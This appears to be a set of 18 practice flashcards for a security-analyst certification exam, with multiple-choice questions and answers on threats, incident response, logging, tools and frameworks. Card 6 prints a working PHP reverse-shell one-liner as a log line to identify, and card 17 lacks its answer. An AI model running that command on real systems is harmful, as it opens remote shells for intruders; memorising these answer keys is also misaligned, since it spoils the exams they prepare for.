Pg11 Flashcards

(18 cards)

1
Q

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

A

Unintentional insider threat

2
Q

A security analyst has received an incident case regarding malware spreading out of control on a customer’s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.
B. Configure the EDR to perform a full scan.
C. Transfer the malware to a sandbox environment.
D. Log in to the affected systems and run netstat.

A

Cross-reference the signature with open-source threat intelligence.

3
Q

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
B. A threat actor has a foothold on the network and is sending out control beacons
C. An administrator executed a new database replication process without notifying the SOC
D. An insider threat actor is running Responder on the local segment, creating traffic replication

A

An administrator executed a new database replication process without notifying the SOC

4
Q

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

A

Risk register

5
Q

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

A

Threshold value

6
Q

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r ’$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

A

Reverse shell

7
Q

Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan
B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

A

Incident response plan

8
Q

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment
B. Deploy compensating controls into the environment
C. Implement server-side logging and automatic updates
D. Conduct regular code reviews using OWASP best practices

A

Conduct regular code reviews using OWASP best practices

9
Q

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst’s investigation?

A. OpenVAS
B. Angry IP Scanner
C. Wireshark
D. Maltego

A

Wireshark

10
Q

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization’s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor’s actions?

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponization

A

Weaponization

11
Q

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

A

CIS Benchmarks

12
Q

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.)

A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems administration

A

Executive management

System Administrators.

13
Q

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage
B. Schedule a task to disable alerting when vulnerability scans are executing
C. Filter all alarms in the SIEM with low severity
D. Add a SOAR rule to drop irrelevant and duplicated notifications

A

Add a SOAR rule to drop irrelevant and duplicated notifications

14
Q

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.

A

A rollback had been executed on the instance.

15
Q

During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis?

A. Fuzzing
B. Static analysis
C. Sandboxing
D. Packet capture

A

Sandboxing

16
Q

A leader on the vulnerability management team is trying to reduce the team’s workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?

A. Assigning a custom recommendation for each finding
B. Analyzing false positives
C. Rendering an additional executive report
D. Regularly checking agent communication with the central console

A

Regularly checking agent communication with the central console

17
Q

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL

18
Q

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

A. Enabling a user account lockout after a limited number of failed attempts
B. Installing a third-party remote access tool and disabling RDP on all devices
C. Implementing a firewall block for the remote system’s IP address
D. Increasing the verbosity of log-on event auditing on all devices

A

Enabling a user account lockout after a limited number of failed attempts